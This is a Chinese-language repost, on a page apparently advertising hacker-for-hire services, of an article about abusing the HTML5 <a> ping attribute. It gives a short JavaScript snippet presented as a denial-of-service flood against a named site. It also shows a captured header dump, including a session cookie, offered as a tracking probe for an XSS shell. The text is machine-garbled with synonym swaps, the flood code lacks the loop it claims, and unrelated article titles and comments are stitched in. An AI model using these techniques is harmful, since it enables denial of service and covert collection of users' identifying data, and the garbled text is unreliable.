当前位置:首页 > 黑客服务 > 正文内容

HTML5:<a>的ping特点之逝世ping与隐私追寻

访客4年前 (2021-04-15)黑客服务592


在HTML5中 标签参加了一个新的特点ping。规划者参加它的理由是, Ping能够使浏览器对外发送一个异步恳求,一般用来广告的追寻、点击率计算或完结一次HTTP重定向。
可是听到监督、追寻这个词,你是不是也觉得有点不舒服,所以Ping这个特点真的是很不受欢迎。浏览器一度抵抗、从而参加默许封闭有必要从如config这样的选项中翻开才干够运用,到现在我从caniuse.com上还没有追寻到哪个浏览器支撑它,但在我测验中最新版Chrome44是默许支撑Ping的。
一、Ping的用法
Ping的用法很简略,这儿举一个比方。
 href="http://www.baidusina" ping="http://www.baidusina/track">click me
当你点击click me的时分,会异步发送一个POST恳求到Ping后边指定的地址,Request Body的内容为PING。有人或许会说,那click me这段代码行不行?答案是否定的,href这个特点有必要存在与中,否则Ping也是不会运转的。
二、逝世之PING
依据Ping发送POST恳求这个特性,咱们能够运用循环使之不断的向一个地址追加POST恳求,形成DOS进犯。
 
var link = document.createElement('a');
link.href="";
link.ping = 'http://www.myhack58.com/';
document.head.appendChild(link); link.click();
运转上面的代码,就会不断的向xisigr.com发送POST恳求。
请运转在线DEMO:DOS.html {chrome}
三、隐私追寻
Ping能够进行广告追寻,它能够计算用户都点击了哪些链接以及次数,并运用POST恳求把这些信息发送到广告商的服务器上。那么POST的这些信息都包含了什么呢,简略来说HTTP Header的内容都会有,咱们来看一个截获的完好信息
HOST: xisigr.com
CONTENT-LENGTH: 4
ORIGIN: http://mail.163.com
PING-FROM: http://****.com/js6/read/readhtml.jsp?mid=458:xtbBygBMgFO+dvBcvQAAsM&font=15&color=064977
USER-AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
PING-TO: http://www.baidu.com/
CONTENT-TYPE: text/ping
ACCEPT: */*
REFERER: http://****.com/js6/read/readhtml.jsp?mid=458:xtbBygBMgFO+dvBcvQAAsM&font=15&color=064977
ACCEPT-ENCODING: gzip, deflate
ACCEPT-LANGUAGE: zh-CN,zh;q=0.8
COOKIE: sessionid=rnbymrrkbkipn7byvdc2hsem5o0vrr13
CACHE-CONTROL: max-age=0
CONNECTION: keep-alive
PING-FROM、USER-AGENT、REFERER这三个要害信息,直接泄漏了用户的隐私。而这也为咱们独爱的XSSSHELL又供给了一个小插件。关于图片探针假如没了新鲜感,那么请试试Ping探针吧,简略的一句就搞定!
追寻这事是进犯者的独爱,我简略做了一个DEMO,翻开aping.html这个页面,点击后,你会前往wathwg,而且我异步重定向了下w3.org,但一起你的HTTP Header/IP就被我获取到了。你能够经过这个链接检查截获到的信息,Ping.html。
请拜访在线DEMO:aping.html Ping.html  {chrome}
四、总结
把PING归结为勘探用户隐私的领域一点也不为过。这其实不怪规划者,Ping的开始规划理念,是为了使得广告计算愈加便利简练,哪怕是它的重定向功用,也是为了在异步恳求的情况下运用户全体进步拜访页面速度的快感。可是这似乎也无法遮掩住PING的潜在勘探用户隐私的特性。或许这便是PING的先天性缺点。
PS:
HTML5中,标签多了几个特点,如download/ping。2012年时,我在百度HI写了一篇《HTML5 A[download] 进犯模型》,就对其时download的进犯思路做了简略的剖析,惋惜百度HI封闭了,download那篇也杳无音信,但三年下来,再看那篇文章,其时提出的一些进犯点,浏览器也现已做了相应的防护,从中看到了攻防对立的改变和浏览器厂商的急进与退让。
这种感悟是挺好的,你能够对应着如笔记般的进行标示,这些改变是什么、为什么这么变等等,我觉得应该时不时的把前些年的文章拿出来,和现在的方式对比下,有些东西不得不从这种长时间轴的总结和更新中才干得出结论来,比方10年间消失的10种WEB进犯、浏览器厂商的急进与退让、10年后WEB是什么样的……
 

扫描二维码推送至手机访问。

版权声明:本文由黑客接单发布,如需转载请注明出处。

本文链接:https://therlest.com/106601.html

分享给朋友:

“HTML5:<a>的ping特点之逝世ping与隐私追寻” 的相关文章

吃鸡鸭的屁股会有病吗?我非常爱吃鸡鸭的屁股,但经常吃会有病吗?另

吃鸡鸭的屁股会有病吗?我非常爱吃鸡鸭的屁股,但经常吃会有病吗?另 鸡鸭的肛门附近组织,布满大大小小的腺体,各类秽物与毒素都在这些腺体囤积;鸡鸭的肛门也有非常高密度的大肠杆菌,所以鸡鸭的屁股不是少吃的问题,而是不能吃.吃得少可能没觉出怎样,多了问题就显出来了.而且鸡鸭屁股的大肠杆菌会随着蛋生出来的时...

身份证信息被黑客盗取(黑客能把手机内身份证信息盗取吗)

一、身份证信息被黑客盗取(黑客能把手机内身份证信息盗取吗)方法总结 1、黑客通过手身份姓名能否窃取别人银行卡里。朋友你好,这个问题不是这样理解的的,黑客是通过你的这些信息,破易你的银行卡号支付密码来盗取你的财物的,一般你只要不乱点链接,不轻易在手机。黑客控制了手机,窃取了身份证号码手机号姓名等所有...

古文化常识(中国古代文化常识大全)

1.中国古代文化常识 文学常识? 四本书:《论语》、《中庸》、《孟子大学》 五经:《诗经》《礼记》《周易》《春秋》 乐府双壁:木兰诗孔雀东南飞 三个字:警告世界,说真话,说真话,唤醒世界,说同样的话 第二枪:第一枪很厉害,第二枪也很厉害 三官:石渠官、潼关官、新安官 三次告别:新婚、老...

dnf国庆套礼包内容 「地下城国庆套2021」

很好,198元类型,比其他的高级时装属性好很多,称号加什么?还副送什么?礼包包含多少套物品?知道的说下!30号维护更新,奇幻之旅称号,非常划算。宝珠,价格是228和198两种时装套。 效果和白虎差不多,包括光环装扮,来说还可以。 100雷米,估计还几套新国庆时装,DNF2012国庆时装198礼包,最...

鸡业行情网今日鸡价,鸡业行情网下载安装

河南:新乡肉鸡价格4点45:鸡架2点鸡肉7点鸡大腿鸡翅根8点鸡爪鸡翅尖鸡翅中鸡心鸡肝,其地址为http,除江苏地区苗鸡价格略涨,烟台网肉鸡价格4点65-4点75元/斤/wyimucom/down-15679html,1点00元/羽,点击“下载文件。以市斤为单位/羽 菏泽鸡苗价格3点90-4点30元/...

铁盖子可以放入高压锅蒸吗?装酱料的铁盖子,外面的涂层有些剥落,好

铁盖子可以放入高压锅蒸吗?装酱料的铁盖子,外面的涂层有些剥落,好 铁盖子可以放入高压锅蒸吗? 装酱料的铁盖子,外面的涂层有些剥落,好象也没锈,可以拿它盖严瓶子入高压锅蒸吗? 绝对不行!既危险又不卫生。盖住的瓶子在高压锅中加热,很容易形成压力差而爆炸;铁在高压锅中的水蒸汽作用下极易变成四氧化三...

评论列表

忿咬喵叽
2年前 (2022-07-06)

面速度的快感。可是这似乎也无法遮掩住PING的潜在勘探用户隐私的特性。或许这便是PING的先天性缺点。PS:HTML5中,标签多了几个特点,如download/ping。2012年时,我在百度HI写了一篇《HTML5 A[download] 进犯模型》,就对其时

辙弃朮生
2年前 (2022-07-06)

track">click me当你点击click me的时分,会异步发送一个POST恳求到Ping后边指定的地址,Request Body的内容为PING。有人或许会说,那click me这段代码行不行?

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。